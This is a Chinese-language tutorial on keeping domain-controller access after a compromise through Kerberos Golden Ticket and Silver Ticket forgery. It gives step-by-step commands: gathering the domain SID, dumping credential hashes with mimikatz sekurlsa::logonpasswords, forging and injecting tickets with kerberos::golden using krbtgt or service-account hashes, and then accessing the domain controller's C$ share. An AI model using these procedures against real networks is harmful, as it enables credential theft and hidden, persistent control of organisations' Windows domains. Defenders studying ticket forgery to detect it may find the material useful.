前言
在我們拿到域控賬號密碼後,爲了防止密碼被改,需要使用權限維持來維持我們取得的域控權限
域票據驗證流程
1.首先將明文密碼發送給AS服務器,AS服務器給我們一個TGT
2.拿着TGT去訪問TGS服務器,TGS服務器給我們一個ST
3.使用獲取到的ST訪問對應的服務
域控權限維持-黃金票據
介紹
ms14068的漏洞原理是僞造域管的TGT,而黃金票據的漏洞原理是僞造krbtgt用戶的票據,krbtgt用戶是域中用來管理髮放票據的用戶,擁有了該用戶的權限,就可以僞造系統中的任意用戶
前提
ms-14-068票據僞造成功之後
過程
1.獲取域名稱:whoami獲取後加上.com即可
2.獲取域的SID值(去掉最後的-四位普通用戶uid 即爲域sid)
whoami /all
3.獲取域的KRBTGT賬戶NTLM密碼哈希或者aes-256值
見14068票據僞造裏導出域hash,點此跳轉
4.清理所有的票據
klist purge
5.使用mimikatz僞造指定用戶的票據並注入到內存
kerberos::golden /admin:要僞造的用戶名 /domain:域名 /sid:寫sid /krbtgt:寫krbtgt的hash值 /ptt
6.直接遠程連接即可
dir \\dc\c$
域控權限維持-白銀票據
介紹
白銀票據與ms14068和黃金票據的原理不太一樣,ms14068和黃金票據都是僞造tgt(門票發放票),而白銀票據則是僞造st(門票),這樣的好處是門票不會經過kdc,從而更加隱蔽,但是僞造的門票只對部分服務起作用,如cifs(文件共享服務),mssql,winrm(windows遠程管理),dns等等
前提
ms-14-068票據僞造成功之後
利用
1.獲取域名:whoami獲取後加上.com即可
2.獲取域sid(去掉最後的-四位普通用戶uid 即爲域sid)
whoami /all
3.獲取要攻擊的目標服務器FQDN
net time /domain 獲取域控名
4.利用文件共享服務cifs,並獲取服務賬號的NTMLHASH
在ms14068的基礎上使用mimikatz抓取密碼(域控名$即爲服務賬號)
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >2.txt
5.找一個要僞造的用戶名
net user /domain
6.清理所有的票據
klist purge
7.使用mimikatz僞造指定用戶的票據並注入內存
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服務賬號NTMLHASH /user:用戶名 /ptt
8.之後直接遠程連接dc
dir \\dc\c$
